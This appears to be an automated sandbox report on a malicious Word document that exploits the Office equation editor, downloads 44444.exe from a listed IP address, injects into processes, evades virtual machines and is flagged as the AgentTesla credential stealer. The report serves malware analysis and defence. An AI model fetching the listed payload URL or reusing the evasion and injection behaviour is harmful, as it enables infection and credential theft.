Source: C:\Users\user\tthxx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad Jump to behavior
Source: C:\Users\user\tthxx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tthxx.exe, 00000004.00000002.2241699219.0000000000580000.00000004.00000001.sdmp, tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\tthxx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Window / User API: threadDelayed 9349 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Window / User API: threadDelayed 398 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2668 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 3036 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2608 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\tthxx.exe TID: 2228 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2236 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396 Thread sleep count: 9349 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396 Thread sleep count: 398 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440 Thread sleep count: 96 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Last function: Thread delayed
Source: C:\Users\user\tthxx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Thread delayed: delay time: 30000 Jump to behavior
Source: tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp Binary or memory string: vmware
Source: C:\Users\user\tthxx.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\tthxx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\tthxx.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Users\user\tthxx.exe Memory allocated: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 Jump to behavior
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 402000 Jump to behavior
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46C000 Jump to behavior
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46E000 Jump to behavior
Source: C:\Users\user\tthxx.exe Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe Jump to behavior
Source: C:\Users\user\tthxx.exe Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe Jump to behavior
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\tthxx.exe Queries volume information: C:\Users\user\tthxx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\tthxx.exe Queries volume information: C:\Users\user\tthxx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tthxx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\tthxx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tthxx.exe PID: 2312, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 404303 Sample: IMG_05412_868_21.docx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Multi AV Scanner detection for domain / URL 2->39 41 Found malware configuration 2->41 43 11 other signatures 2->43 7 EQNEDT32.EXE 12 2->7         started        12 EQNEDT32.EXE 9 2->12         started        14 WINWORD.EXE 293 25 2->14         started        16 3 other processes 2->16 process3 dnsIp4 35 31.210.20.6, 49167, 80 PLUSSERVER-ASN1DE Netherlands 7->35 31 C:\Users\user\tthxx.exe, PE32 7->31 dropped 33 C:\Users\user\AppData\Local\...\44444[1].exe, PE32 7->33 dropped 59 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->59 18 tthxx.exe 5 7->18         started        22 tthxx.exe 2 12->22         started        file5 signatures6 process7 file8 27 C:\Users\user\AppData\Roaming\...\notpad.exe, PE32 18->27 dropped 29 C:\Users\user\AppData\Local\Temp\tthxx.exe, PE32 18->29 dropped 45 Multi AV Scanner detection for dropped file 18->45 47 Creates an undocumented autostart registry key 18->47 49 Writes to foreign memory regions 18->49 51 2 other signatures 18->51 24 tthxx.exe 2 18->24         started        signatures9 process10 signatures11 53 Multi AV Scanner detection for dropped file 24->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 24->57
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
31.210.20.6
 unknown Netherlands
61157 PLUSSERVER-ASN1DE true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://31.210.20.6/3/44444.exe true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown